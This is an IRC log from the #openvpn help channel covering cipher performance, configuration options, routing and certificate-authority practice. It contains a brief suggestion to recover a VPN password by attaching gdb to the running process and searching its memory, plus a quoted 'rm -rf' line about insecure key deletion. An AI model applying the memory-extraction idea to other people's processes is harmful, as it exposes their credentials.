[~chris@p5B13CB37.dip0.t-ipconnect.de] has quit [Quit: Leaving.] 01:32 -!- RealRancor2 is now known as RealRancor 01:34 < hid3> Indeed 01:34 <+pekster> hid3: blowfish symmetric crypto (the default) is one of your lowest CPU choices, at least if you want strong crypto (choices like rc4 are awful, and I'm not sure will even give you realistic improvements in CPU.) 01:34 < hid3> Besides, I was asking about software optimizations, not hardware 01:34 < hid3> and besides, there aren't SSDs with 68-pin SCSI or 40-pin IDE connectors 01:34 <+pekster> BF has higher times for re-keying (1/h by default) but that won't block traffic flow when it sets up new keys 01:35 < hid3> pekster: what about aes-128-cbc? Isn't it faster than BF? 01:35 < hid3> I also found some 'fast-io' option, hope this also helps 01:36 <+pekster> bf 128 is generally going to be faster than AES, unless you've got a hardware crypto module 01:36 < hid3> great, thanks 01:37 <+pekster> Are you actually capping out your CPU when you load up the VPN? 01:37 < hid3> One more thing: is there any point in reducing client/server certificate bits from 1024 down to 384 in order to boot the performance, at least a little bit? 01:37 <+pekster> Also, if you're multi-core, know that openvpn is single-threaded, so you'd need to distribute the load across $nCPU instances evenly to get max yield 01:37 < hid3> In fact, yes, the CPU is being used at 65-80% when a client is connected 01:37 <+pekster> No, the X509 keypairs are only used for the TLS channel 01:38 < hid3> yep, I'm multi-CPU and I'm aware of OpenVPN being single-threaded 01:38 < hid3> and not sure if I can make it use more than once CPU 01:39 <+pekster> Sort of like ssh, a larger keysize only impacts the initial connection (and technically things like session rekeys, but that's not impacting your traffic flow) 01:39 < hid3> Oh, I see 01:39 <+pekster> >1 instance is the only way to get openvpn to leverage mutliple CPUs. That only applies if you have multiple users online at once 01:39 < hid3> No! Only one client :) 01:40 <+pekster> Short of disabling crypto there's not much you can do then. Might as well run sit/GRE instead at that point 01:40 < hid3> BTW, why that guy was suggesting getting and SSD? How THAT would help? I have my status file completely disabled... And I thought OpenVPN is inside RAM, not HDD 01:40 <+pekster> Or price out a nice atom CPU? :P 01:40 <+pekster> Yea, no clue on that suggestion; it was obviously poor 01:41 < hid3> pekster: considering Atom but not at this time (already have a few ones but for different apps. Satisfied!) 01:41 < hid3> well, I just need satisfactionary OpenVPN connection at this time. Not much of turbo/ultra fast/stable, etc 01:41 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 248 seconds] 01:42 <+pekster> I can get fairly decent speeds on my embedded router running at I think 400 MHz with 32M RAM total (including for the kernel, etc) 01:42 <+pekster> At least, decent across most Internet links you find today 01:42 <+pekster> (sure, locally there's nothing like 100 or 1000-Base-T) 01:42 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 01:42 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 01:42 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 01:42 < hid3> With encryption completely off, right? 01:43 <+pekster> No, with crypto. It's not a problem when I deployed some of these units last regular gig to a dozen of the perma-remote staff at that job, including our CEO 01:43 <+pekster> s/our/their/ 01:44 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 01:44 < hid3> Well, I'm from Lithuania, we have one of the fastest Internet links in Europe. 1 Gbps local traffic (to Lithuania networks) and ~800 Mbps to foreign networks ;-) 01:44 <+pekster> Yea, to get anywhere *near* those kinds of speeds with symmetric encryption of network data you're gunna need much better hardware 01:45 <+pekster> Consider looking at hardware AES devices if you're building a box to fill a specific need like that 01:45 < hid3> no, again, as I said. Just a decent connection (15-25 Mbps would be enough) :) 01:46 <+pekster> I don't have the benchmark data in front of me, but I was pretty sure I could get around that with my crappy $30 Asus embedded router... 01:46 < hid3> Similar case here. My server was originally made (in France, BTW) in 1998-1999 01:47 < hid3> And yes, it still works! 01:47 < hid3> The only upgrades were some additional Gigabit NICs and larger SCSI HDDs 01:48 <+pekster> You could try to benchmark some ciphertests via openssl. For example, comparing bf-cbc with aes-128-cbc: 'openssl speed bf-cbc aes-128-cbc' 01:48 < hid3> Nowadays I've never seen a server made in some Euro country. Usually it's Taiwan, Malaysia, China, etc. 01:48 <+pekster> That'll show you bps processing at various block sizes 01:49 < hid3> wow, great, didn't know that. I'll try this out! 01:49 <+pekster> At low block sizes (like you get with stream processing: eg openvpn) blowfish is usually between 1.5 - 3 times faster 01:49 < hid3> looks like BF is slightly faster at smaller block sizes... 01:50 < hid3> yep, true :) 01:50 <+pekster> AES hardware skews that massively toward AES, of course (openssl probably needs some evp/engine value to use it if you have one) 01:52 < hid3> BF is almost 5 times faster than des-ede3 ;-) 01:52 < hid3> OpenVPN is great. It has got a reasonably fast compression method by default. 01:52 <+pekster> Yea, and tripple-des is falling out of some popularity for that primary reason 01:53 <+pekster> Indeed: lzo is a stream compressor, so it's not nearly as good as dictionary-based solutions (zip, gzip, bzip, lzma, etc) but it can be processed in realtime 01:54 < hid3> well, I don't see any point in compression unless you're using a dial-up 01:54 <+pekster> Depends if CPU or bandwidth is a bigger blocker for throughput 01:55 < hid3> Neither should be these days. Pretty fast conenctivity (well, at least where I live) and pretty fast CPUs.. Almost everyone has got no less than 60-80 Mbps at home and at average Core i3 CPU 01:57 <+pekster> After initial burst, my (fairly typical for US broadband) cable download peaks at around 15 Mbps. It's also about 3x the cost of broadband service compared to Sweeden, for example 01:57 <+pekster> You can get faster here, but you tend to pay for it dearly 01:58 < hid3> Wow 01:58 < hid3> I thought people live better in North America 01:58 <+pekster> Welcome to land of the 2nd world, over-priced ISP service ;) 01:58 < hid3> but why is it so? 01:58 <+pekster> Monopolies mostly 01:59 < hid3> oh yeah. We have monopolies here. Electricity power, home heating, food sellers, etc 01:59 <+pekster> Some ISPs toy with monthly bandwidth caps ranging from 150GB/mo to 300GB/mo. 6 years or so back I was on a "soft cap" of 250G, but they didn't really do anything unless they wanted to. We're officially "Uncapped" again, although I'm sure they call customers who eat unusually large amounts 02:00 <+pekster> As much as it's a pain here, I hear Canada has it slightly worse (if that's possible) 02:00 <+pekster> Similar prices, but some providers have really low bandwidth caps 02:00 < hid3> Electricity is getting expensive. like $0.30/kWh. Home heating is also expensive. It's almost equal to average month salary on a cold winter month 02:01 <+pekster> Yea, that's pricey. We're I think $0.07 USD/kWh for the local electric grid now 02:01 <+pekster> Central US, just under Canada, so not the most expensive electric cost in the country 02:01 < hid3> 300 GB is a daily traffic for most of us :) 02:01 <+pekster> Yea... :( 02:02 <+pekster> fwiw, I ran through some cbc openssl speed tests, and on my Celeron 2.3GHz processor in my headless VPN box, nothing goes faster than BF at the lower block sizes 02:03 <+pekster> Nothing even comes close, so unless you get better/different results, you're probably just out of luck 02:03 < hid3> I'm sure I'll just leave the BF alone. I'll need to try the 'fast-io' option 02:04 < hid3> Is there any benefit of running OpenVPN as a different user, not root? 02:04 <+pekster> Yup, see --user and --group 02:05 < hid3> I suspect this option is for paranoid/security people 02:05 < hid3> And what's the benefit of that? 02:05 <+pekster> You probably also want/need the --persist-key and maybe --persist-tun options too 02:05 < hid3> I have them both, already 02:05 <+pekster> Downgrade runtime user in the event of some future attack of the protocol that allows an attacker to execute code as the UID of the process 02:05 <+pekster> "extra protection" basically. "just in case" ;) 02:07 < hid3> yeah. For paranoid people 02:07 <+pekster> The general unix mentality is 'run with as few priveliges as possible' verses the Windows version of "if you don't run as an admin, lots of stuff (may) not work" 02:08 <+pekster> sudo runs circles around the equivelent "runas" functionality of Windows 02:09 < JyZyXEL> should i use --persist-tun with --keepalive 10 120 ? 02:09 <+pekster> JyZyXEL: Those options have nothing to do with one another 02:09 <+pekster> Sure, you can use both if you'd like, but they're not related 02:11 < JyZyXEL> i feel that it would be good 02:11 <+pekster> --persist-tun is more or less required to handle restarts (USR1 or HUP) when you downgrade the runtime user with --user 02:14 < JyZyXEL> i wonder if there is something else i would want 02:15 <+pekster> --do-my-laundry-and-make-coffee ? 02:16 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Operation timed out] 02:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 02:17 < walp> --load-bowl 02:21 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 02:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 02:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 02:30 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:32 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 02:32 <+pekster> Here ya go (actual laundry-performing and coffee-making functionality is, naturally, missing.) http://pekster.sdf.org/misc/openvpn-laundry-coffee.patch 02:33 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 02:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds] 02:43 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 02:49 <+pekster> Results: http://fpaste.org/3fK8/ 02:50 <+pekster> I love open-source code 02:56 <+pekster> hid3: In all seriousness, I'd be curious if you get a noticable speed improvement with --fast-io 03:05 -!- frsk [fredrik@frsk.net] has quit [Remote host closed the connection] 03:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:14 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 272 seconds] 03:27 -!- b1rkh0ff [~b1rkh0ff@178.77.2.66] has quit [Read error: Operation timed out] 03:37 -!- thermoman [~thermoman@idle.foobar0815.de] has quit [Ping timeout: 264 seconds] 03:50 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:01 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 04:01 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 04:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 240 seconds] 04:06 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 04:10 -!- yavor [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 04:12 -!- zz_AsadH is now known as AsadH 04:14 -!- angs [~ubuntu@46-236-109-10.customer.t3.se] has joined #openvpn 04:14 -!- ade_b [~Ade@37.250.124.197.bredband.tre.se] has joined #openvpn 04:14 -!- ade_b [~Ade@37.250.124.197.bredband.tre.se] has quit [Changing host] 04:14 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:14 < angs> why do I get permission denied for this operation 04:14 < angs> root@ubuntu:/etc/openvpn/2.0# ./vars 04:14 < angs> bash: ./vars: Permission denied 04:16 <+pekster> You need to source it, not execute it 04:17 < angs> thank you pekster 04:17 < angs> how can I source it? 04:18 <+pekster> the source command, or the alias "." (you'll notice all the guides have you do: . ./vars for that reason) 04:18 <+pekster> See also: 04:18 <+pekster> !howto 04:18 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 04:18 < angs> thank you 04:22 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 04:29 -!- dazo_afk is now known as dazo 04:33 -!- ade_b [~Ade@109.58.227.250.bredband.tre.se] has joined #openvpn 04:33 -!- ade_b [~Ade@109.58.227.250.bredband.tre.se] has quit [Changing host] 04:33 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:21 -!- mode/#openvpn [-v pekster] by ChanServ 05:22 < jforman> pekster: sorry for the delay, it is a tun setup. let me try that tcpdump cli and see what shows up 05:23 -!- yavor [~yavor@78.128.23.17] has joined #openvpn 05:23 -!- yavor is now known as y4h0 05:23 < y4h0> hey 05:24 < y4h0> can i configure openvpn to use only passwords for authentication ? 05:28 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 05:29 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 05:49 -!- angs [~ubuntu@46-236-109-10.customer.t3.se] has quit [Remote host closed the connection] 06:03 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 246 seconds] 06:08 -!- gedO_ [~quassel@esc.ortopedija.lt] has joined #openvpn 06:08 -!- gedO [~quassel@esc.ortopedija.lt] has joined #openvpn 06:11 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 06:15 -!- defswork [~andy@141.0.50.105] has joined #openvpn 06:16 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 06:19 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has joined #openvpn 06:22 -!- gedO [~quassel@esc.ortopedija.lt] has quit [Remote host closed the connection] 06:22 -!- gedO_ [~quassel@esc.ortopedija.lt] has quit [Remote host closed the connection] 06:29 -!- benedikt [~benedikt@unaffiliated/benedikt] has joined #openvpn 06:30 < benedikt> I have an odd use-case. I have set up an openvpn server, that NATs the VPN subnet onto the internet. 06:30 < benedikt> I want to connect to this VPN with a linux host that is also a NAT server for its internal network 06:30 < benedikt> so that hosts on the internal network are routed something like 06:30 < benedikt> internal -> liunx nat -> openvpn nat -> internet 06:31 < benedikt> the linux box can connect and works fine, but client on the internal network loose connection with the internet 06:31 < benedikt> is ther anything special i should keep in mind when i start debugging this again? 06:51 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 06:54 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 06:55 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 07:01 < hid3> Any ideas how to disable IPv6 in OpenVPN (server) config? Simply I don't need it. 07:02 -!- master_of_master [~master_of@p57B53D36.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 07:03 <@plaisthos> hid3: just don't enable it 07:04 -!- master_of_master [~master_of@p57B532CC.dip.t-dialin.net] has joined #openvpn 07:05 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 07:14 < kisom> Guys, what's the difference between tap and --topology subnet? 07:14 < kisom> To me it seems like they are just about the same. 07:16 <@ecrist> not at all, aside from addressing 07:16 <@ecrist> top is a layer 2 device, whereas tun is a layer 3 device 07:16 <@ecrist> tap passes ethernet frames, tun does not 07:24 < kisom> ecrist: So what happens to broadcasts etc to the /24 network? 07:25 <@ecrist> nothing 07:41 -!- Devastator [~devas@177.18.196.246] has joined #openvpn 07:54 -!- jforman [~jforman@unaffiliated/jforman] has left #openvpn [] 08:01 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 240 seconds] 08:05 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 08:09 < WDKevin> fys, you around? 08:09 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 08:10 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 08:15 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 244 seconds] 08:16 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 08:39 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 08:49 -!- RealRancor [~Rancor3@mafiaforum.de] has quit [Read error: Connection reset by peer] 08:51 -!- Devastator [~devas@177.18.196.246] has quit [Changing host] 08:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 09:03 <@dazo> kisom: with TAP you'll get the broadcasts ... and TAP is only "topology subnet" .... but with TUN + topology subnet, you'll get a more "sane" IP setup, not spending 4 IPs for each client ... but you can only pass IP traffic (layer3) and you don't get the broadcast traffic (that's dropped) .... but should (in theory at least) be possible to get multicast traffic if needed, though 09:04 <@dazo> hid3: don't configure it (--server-ipv6) ... and it won't be used 09:04 <@dazo> but most OS today assign link-local IPv6 addresses automatically - but that's the OS kernel doing it, not OpenVPN 09:05 <@dazo> (and link-local addresses are never routed anywhere, you need global IPv6 addresses to get the routed out of your own local net) 09:45 < WDKevin> if i have my push route in the server config, do i need a pull or anything similar in the client config for it to work? 09:47 < rob0> --client includes --pull 09:47 < WDKevin> ok 09:47 < WDKevin> ive got client 09:48 < WDKevin> i need to add an iptables rule on the vpn server as well, right? 09:49 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 09:54 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 09:54 -!- AsadH is now known as zz_AsadH 09:58 < WDKevin> im able to ping the local ip of the vpn server within my network, but not any other servers on my network 09:58 < WDKevin> ive added 2 iptables rules from this page: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 09:58 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 09:58 < WDKevin> but still nothing 10:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds] 10:03 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 10:04 < rob0> !serverlan 10:04 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 10:08 < WDKevin> i have ip forwarding enabled already 10:08 < WDKevin> and i am pushing the route in my server config 10:08 < WDKevin> my local servers are all on 192.168.1.* address 10:08 < WDKevin> my push line reads: 10:09 < WDKevin> push "route 192.168.1.0 255.255.255.0" 10:09 < rob0> Did you follow through the flowchart? 10:09 < WDKevin> going through it now 10:10 < WDKevin> ok 10:10 < WDKevin> im at this step: 10:10 < WDKevin> 'Add a route to the router so it knows how to reach the vpn subnet" 10:10 < WDKevin> Can you explain that a little for me? 10:13 -!- Orbi [~opera@anon-147-196.vpn.ipredator.se] has joined #openvpn 10:15 -!- raidz_away is now known as raidz 10:16 <@plaisthos> WDKevin: that is general routing and not openvpn specific 10:17 < WDKevin> would that imply that i shouldnt be able to reach my machines from within my network at home as well, then? 10:17 < havoc> I was just thinking how it'd be nice to have coordinated cooperation amongs channels/projects on freenod 10:17 < havoc> e.g. "Go to ##networking, and ask about 'routing 10:17 < havoc> e.g. "Go to ##networking, and ask about 'routing', then come back here" 10:18 < WDKevin> plaisthos, or does that means since my vpn's are all on 10.0.8.* ip's that i need to tell my router about them? 10:18 < WDKevin> vpn clients* 10:18 < rob0> havoc, I don't think IRC could ever possibly substitute for knowing the basics. 10:19 < havoc> rob0: I agree, I was just thinking that #networking would be a better place to start 10:19 <@plaisthos> WDKevin: from your question I think you should read about basic routing 10:19 < havoc> i.e. learn your requirements first 10:19 < WDKevin> fair enough 10:19 -!- Orbi [~opera@anon-147-196.vpn.ipredator.se] has quit [Ping timeout: 248 seconds] 10:19 < WDKevin> we all have to start somewhere 10:19 < havoc> WDKevin: oh, I'm not critisizing you, or anyone, I'm trying to come up with a solution 10:19 <@plaisthos> I want to sound harsh but without a general understand of how routing works this will be hard to explain 10:20 < WDKevin> i understand 10:20 < WDKevin> i mean i understand what you're saying 10:20 < havoc> plaisthos, rob0: sometimes you have to ask at least once before you can know that there is more to know 10:20 <@dazo> !tcpip 10:20 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 10:20 < havoc> "What do I need to know/learn to do this?" 10:21 <@plaisthos> dazo: yeah that one ;) 10:21 < havoc> of course people on both sides of the issue would have to be patient enough for it to work 10:22 < havoc> WDKevin: basically you need/want to know IPv4 "routing", and its requirements 10:22 < WDKevin> ok 10:22 < WDKevin> ill look into it 10:22 <@dazo> WDKevin: not sure you saw that URL (!tcpip) ... but you'll save a lot of frustration by going through chapter 3.1 and trying to understand that 10:22 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 10:22 < WDKevin> though i still have the same router configs as the last time i had openvpn working, just a few months ago 10:23 <@dazo> WDKevin: nothing stops working out-of-the-blue .... if it worked then but not now ... believe it or not ... something did change 10:23 < WDKevin> im not arguing that 10:23 < WDKevin> i shutdown the standalone server and virtualized it 10:23 < WDKevin> reset up openvpn with different auth settings 10:24 <@dazo> then you definitely need to get a grasp of network routing .... and then learn to use tcpdump to see where the traffic goes in reality ... and figure out why it does so and then you can change it properly 10:37 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 10:37 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 10:41 -!- zz_AsadH is now known as AsadH 10:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:50 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 276 seconds] 10:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 11:00 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 11:04 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 11:10 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 11:24 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 11:25 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 256 seconds] 11:41 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:54 -!- nickanderson_afk is now known as nickanderson 11:58 < Devastator> pekster I've made a step by step of how I would handle certs/keys, you are probably going to laugh even without wine, but if you wanna take a look anyway, ping me 11:58 -!- AsadH is now known as zz_AsadH 12:01 -!- ade_b [~Ade@host-78-65-176-101.homerun.telia.com] has joined #openvpn 12:01 -!- ade_b [~Ade@host-78-65-176-101.homerun.telia.com] has quit [Changing host] 12:01 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:10 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye] 12:12 -!- pikaro [~vinter@pD9E607D1.dip.t-dialin.net] has joined #openvpn 12:17 -!- BtbN [~btbn@btbn.de] has joined #openvpn 12:18 < pikaro> hi! i've got a problem here. got a vpn account for work today, and started a vpn session. being the idiot that I am, I closed the window containing my password. my vpn session is still running, though. is there any way at all to retrieve the password from it? I've got full root access to the computer I'm on, running Debian unstable. The hash would likely suffice, it was just 8 characters. 12:18 <@dazo> Devastator: I'm interested in that topic as well ... so if you dare show it to me, I can surely review it for you 12:18 <@dazo> pikaro: nope, no chance 12:19 < pikaro> FUCK. I'm screwed, goodbye deadline. 12:19 <@dazo> pikaro: you could of course start a gdb session on the running openvpn instance, unless the openvpn config uses --auth-nocache 12:19 < pikaro> thanks anyways 12:19 <@dazo> but digging through the memory segments where it could be stored will take so much time and render openvpn useless during that time it will disconnect 12:20 < pikaro> it does not 12:21 <@dazo> pikaro: you need debug packages installed ... and you need gdb ... a lot of patience and gdb skills ... and with that there's a low chance you'll be able to dig up the info 12:21 -!- nze [~user@unaffiliated/nze] has joined #openvpn 12:21 < pikaro> would it be stored in clear text? I still remember the first character and the last three... 12:22 <@dazo> pikaro: my recommendation ... work as hell as long as the tunnel is available ... and get the password tomorrow 12:22 < Devastator> dazo, sure, excuse my english: http://codepad.org/n0OKFcMM 12:22 <@vpnHelper> Title: Plain Text code - 12 lines - codepad (at codepad.org) 12:23 <@dazo> pikaro: it will most likely be in clear text 12:23 < Devastator> just don't laugh too loud :P 12:24 <@dazo> Devastator: in fact, you're doing the right thing for a paranoid setup! /me likes step #2, #3 and #4 12:24 < nze> i'm trying to set up openvpn on a centos 5.9 vps; when i try to start openvpn, i get a complaint about /dev/net/tun missing. so i tried to insmod tun, but /lib/modules is empty. how can i see if the kernel was compiled with support for loading modules dynamically? 12:24 < pikaro> alright then :( still screwed, though... thanks anyways! 12:25 < nze> and how do i check which modules have been compiled into the kernel statically? 12:25 <@dazo> Devastator: be careful with the clean-all and build-ca steps .... those should only be done one time. And whenever you need to create a new server or client cert on the same CA, you just do the build-key-server or build-key-client, plus the copy stuff 12:26 <@dazo> Devastator: you only need dh{n}.pem on the server side, though 12:26 < nze> [not 100% this is the right place for these questions, but fundamentally i want to use openvpn; it just seems to require the tun module] 12:26 <@dazo> Devastator: and build-key-{server,client} will do the sign-req stuff for you ... no need to do that twice :) 12:26 <@dazo> Devastator: except of that ... good job! 12:27 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:27 <@dazo> Devastator: I started this wiki page a long time ago ... haven't had time to clean it up and finalise it ... but here's some more background on this topic: https://community.openvpn.net/openvpn/wiki/How_does_PKI_work 12:27 <@vpnHelper> Title: How_does_PKI_work – OpenVPN Community (at community.openvpn.net) 12:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:28 <@plaisthos> dazo: the client ignores if not compiled with CLIENT_ONLY :) 12:28 < Devastator> dazo ok, because yesterday I was told to generate csr instead of already signed cert/key, but I thought just like you, as I'm doing in an "offline" site 12:28 <@dazo> nze: I guess your VPS is openVZ or something like that? .... if so, you need to ask your VPS provider to enable the tun device for you 12:29 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:29 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:29 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:29 -!- mode/#openvpn [+o krzee] by ChanServ 12:29 < Devastator> dazo should this "another computer" be out of internet just to be extra cautious? 12:29 <@dazo> Devastator: well, the gen csr stuff makes sense if the client does the key generation and sends just the CSR file to the CA ... then the CA can validate the CSR info, and provide a CRT if it decided to sign the CSR 12:30 <@dazo> Devastator: if your CA is completely off-line, that is surely the best step ... as the CA is the most sacred files you'll ever have in your hands 12:30 <@dazo> especially the ca.key 12:30 < Devastator> understood! 12:30 <@dazo> plaisthos: the client ignores what when? 12:30 <@dazo> Devastator++ :) 12:30 < Devastator> well, I guess I will be running my vpn tomorrow then 12:31 <@dazo> :) 12:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Client Quit] 12:31 < Devastator> less than I expected heheh 12:31 <@dazo> Devastator: CA stuff sounds hefty and heavy and complicated ... but in fact, if you just understand the small pieces and how they interact, managing a CA isn't that hard :) 12:32 < Devastator> when you say "send the CSR to the CA", you mean copy the CSR to the CA site, correct? 12:32 <@dazo> correct 12:33 < Devastator> because everytime I read the word send, I think of a tool which would send it over the lan/internet, but I guess this is not the case 12:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:33 <@dazo> The client can do a ./build-req ... which makes only the client.key + client.csr .... send the client.csr to CA and get a client.crt back 12:34 < Devastator> correct 12:34 <@plaisthos> dazo: the client only ignores a dh xxx.pem option if it is compiled without the CLIENT_ONLY option, otherwise it bites you for not knowing --dh 12:34 <@dazo> the CSR contains a the public key of the client + certificate subject info (Common Name, etc, etc) ... and the CA will the, with ./sign-req, display this info and ask you: Is this information correct? ... and if yes, it signs the CSR with it's CA key 12:35 < Devastator> I'm so relieved right now, I have been studying this for 2 days 12:36 <@dazo> plaisthos: the DH params isn't loaded on clients ... it shouldn't at least ... that's just a big prime used for the DH key exchange, and will be transferred over the wire to the client no matter 12:36 <@dazo> (dhparam isn' 12:36 <@dazo> isn't a secret either) 12:36 < walp> dazo: so it doesn't need to be specified in the client conf at all? 12:36 <@dazo> nope 12:36 <@dazo> only server 12:37 < walp> cool 12:37 < Devastator> dazo can client.conf be shared no problem? of course, changing crt and key 12:37 <@dazo> Devastator: yes, it can 12:38 < Devastator> great! I'm all set I guess heheh 12:38 <@dazo> Devastator: congrats :) 12:38 < walp> "Who is this Diffie guy, and why is he in my mayonnaise?" 12:39 <@dazo> plaisthos: if you don't believe me ... look at init_ssl() in ssl.c ... and then look for tls_ctx_load_dh_params() ;-) 12:39 < Devastator> dazo if you find my steps useful, I can improve it cosmetically speaking, for a howto or so 12:40 <@dazo> Devastator: putting a bit more words to those steps and cleaning it up would definitely make sense ... and you can add them to the community.openvpn.net wiki if you want to 12:41 -!- pikaro [~vinter@pD9E607D1.dip.t-dialin.net] has quit [Quit: Leaving] 12:45 < Devastator> dazo sure! it's nice to give something back 12:45 <@dazo> Devastator++ :) 13:03 -!- socomm [~socomm@96-40-128-63.dhcp.mtpk.ca.charter.com] has joined #openvpn 13:03 -!- socomm [~socomm@96-40-128-63.dhcp.mtpk.ca.charter.com] has left #openvpn ["WeeChat 0.3.7"] 13:03 -!- scampbell [~scampbell@mail.scampbell.net] has joined #openvpn 13:14 -!- zz_AsadH is now known as AsadH 13:18 < pekster> Devastator: It's fine to use an offline CA like that, but the "truely paranoid" (you'll have to decide if you fall into this category) try not to let private keys touch another system since that increases the chances they can be recovered (compromise of any place the private key is opens up the door to a brute-force attack 13:19 < Devastator> pekster another system includes a live distro? 13:20 < pekster> I don't really like the idea of generating a server key on a USB stick either (easy-rsa doesn't encrypt the server key with a passphrase, so you're literally storing the raw bytes on your USB stick.) Flash is much harder to "erase properly" due to wear-leveling. If you simply "rm -rf /usb/*" the data is usually trivial to recover; a full wipe may work against most attackers, although flash does things like wear leveling that "could" make f 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 13:20 < pekster> Simple rule for the paranoid: never generate private keys where they aren't used 13:21 <@krzee> unless using embedded devices! 13:21 < pekster> I don't see the point of generating the server key on anything except the server. But that means you need to "stage" a duplicate easy-rsa setup (in terms of setting and sourcing vars) and run build-req on that box, then 